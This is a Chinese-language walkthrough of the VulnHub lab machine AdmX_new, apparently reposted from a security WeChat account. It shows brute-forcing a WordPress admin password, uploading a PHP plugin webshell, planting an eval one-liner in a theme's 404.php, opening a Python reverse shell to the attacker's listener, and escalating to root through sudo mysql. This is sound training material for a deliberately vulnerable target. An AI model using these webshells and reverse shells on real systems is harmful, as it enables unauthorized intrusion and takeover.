0x01 下载地址

https://download.vulnhub.com/admx/AdmX_new.7z

0x02 靶机目标

取得 2 个 flag + root 权限

0x03 工具准备

• 密码字典：https://github.com/fuzz-security/SuperWordlist

• 蚁剑Loader：https://github.com/AntSwordProject/AntSword-Loader

• Python反弹shell：

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.104",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

0x04 详细步骤

一、主机发现

sudo nmap -sn 10.0.0.0/24

二、端口扫描

sudo nmap -p- 10.0.0.105
sudo nmap -p80 -sV 10.0.0.105

三、Web目录扫描

方法一：dirsearch

略

方法二：dirb

略

方法三：feroxbuster

sudo apt install feroxbuster -y#由于feroxbuster本身没有内建目录字典，需要调用seclists中的字典，所以这个也需要安装一下sudo apt install seclists -y

feroxbuster --url http://10.0.0.105

经扫描发现的可用目录为http://10.0.0.105/wordpress/

浏览器访问http://10.0.0.105

通过浏览访问http://10.0.0.105/wordpress发现该页面经过长时间的加载始终无法完成，所以需要通过Burp抓包分析网站加载过程。

四、Burp分析（Match&Replace）

通过Burp抓包分析发现，该站点加载过程中会向192.168.159.145申请加载JS资源，故造成站点加载速度慢

为解决这个问题，在Burp做如下设置：响应头部和响应体中192.168.159.145替换成10.0.0.105

再次刷新浏览器，页面加载正常

但在前台页面并没发现更多的漏洞。

五、爆破管理员密码

再次返回查看目录扫描结果，访问http://10.0.0.105/wordpress/wp-admin，确认找到WordPress后台管理地址

经测试，该登录入口不存在SQL注入（万能密码）漏洞，故采用暴力破解的方法

输入正确的用户名时：提示密码错误

输入不存在的用户名时：提示用户名不知道

开始密码爆破

使用Burp截获提交登录密码的包

发送到Intruder，只对密码进行破解

设置Payload，加载MidPwds.txt密码字典

经测试，密码为adam14

登录管理员账户，查看后台管理页面，查看WordPress版本为5.7.1，主题为Twenty Twenty-One

六、WordPress系统GetShell（3种方法）

• Media->Add New->上传Shell

• Appearance->Edit Themes->404Template->直接写入一句话木马eavl($_POST['cmd']);

• Plugins->Add New->Upload Plugin->上传一个自己手写的插件

cat shell.php
<?php
/**
 * Plugin Name: Webshell
 * Plugin URI: https://yuanfh.github.io
 * Description: WP Wehshell for Pentest
 * Version: 1.0
 * Author: yuanfh
 * Author URI: https://yuanfh.github.io
 * License: https://yuanfh.github.io
*/

if(isset($_GET['cmd']))
        {
                system($_GET['cmd']);
        }
?>

zip shell.zip shell.php

访问一下上传的shell

http://10.0.0.105/wordpress/wp-content/plugins/shell.php?cmd=id

已经实现系统命令执行

七、反弹Shell

kali主机监听5555端口

nc -lnvp 5555

靶机上是否存在nc、python3

http://10.0.0.105/wordpress/wp-content/plugins/shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.0.0.104%22,5555));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27

反弹成功

启动MSF

msfconsole

search wordpress admin

use 2

show options

set PASSWORD adam14
set RHOSTS 10.0.0.105
set TARGETURI /wordpress
set USERNAME admin
run

但这个Shell功能并不完整如pwd，ls等命令都没有回显，所以依然选择使用Python3反弹的Shell

在404模板页面写入一句话木马

cd wp-content/themes/twentytwentyone

vi 404.php

但功能依然有缺陷，vi编辑器无法显示

1. 切换Kali默认SHELL为Bash

chsh -s /bin/bash
reboot

待系统重启完成后

2. 按照之前步骤重新使用Python3获取系统WebShell（过程略）

3. 按下键盘Ctrl+z

4. stty raw -echo

5. fg

6. 系列命令

ls
export SHELL=/bin/bash
export TERM=screen
stty rows 38 columns 116
reset

再次编辑404.php模板

cd wp-content/themes/twentytwentyone
vi 404.php

可以正常使用

八、使用蚁剑连接Shell

连接地址：

http://10.0.0.105/wordpress/wp-content/themes/twentytwentyone/404.php

设置蚁剑参数

成功连接

Tip：一般系统的Shell都较难获取，一但获取某个Shell权限后，建议多种方式，多挣途径，多准备几个Shell，以防Shell权限丢失。

九、系统提权

前期通过系统信息收集该系统存在wpadmin账户，内核版本5.4无法提权

通过WordPress配置文件找到了数据库配置文件，找到数据库连接密码

连接数据库用户名admin、密码：Wp_Admin#123

尝试切换wpadmin，并使用adam14密码登录

su wpadmin

登录成功

在wpadmin获取第一个flag

cd ~
cat local.txt

查询用户权限：

sudo -l

该用户不需要密码 sudo mysql

sudo /usr/bin/mysql -u root -D wordpress -p

输入密码adam14

成功登录数据库

十、Mysql提权

system id

system /bin/bash

cd ~
cat proot.txt

本文版权归作者和微信公众号平台共有，重在学习交流，不以任何盈利为目的，欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用，大部分文章来自各大安全社区，个人博客，如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览！！！

敲敲小黑板：《刑法》第二百八十五条　【非法侵入计算机信息系统罪；非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。

原文始发于微信公众号（巢安实验室）：AdmX_New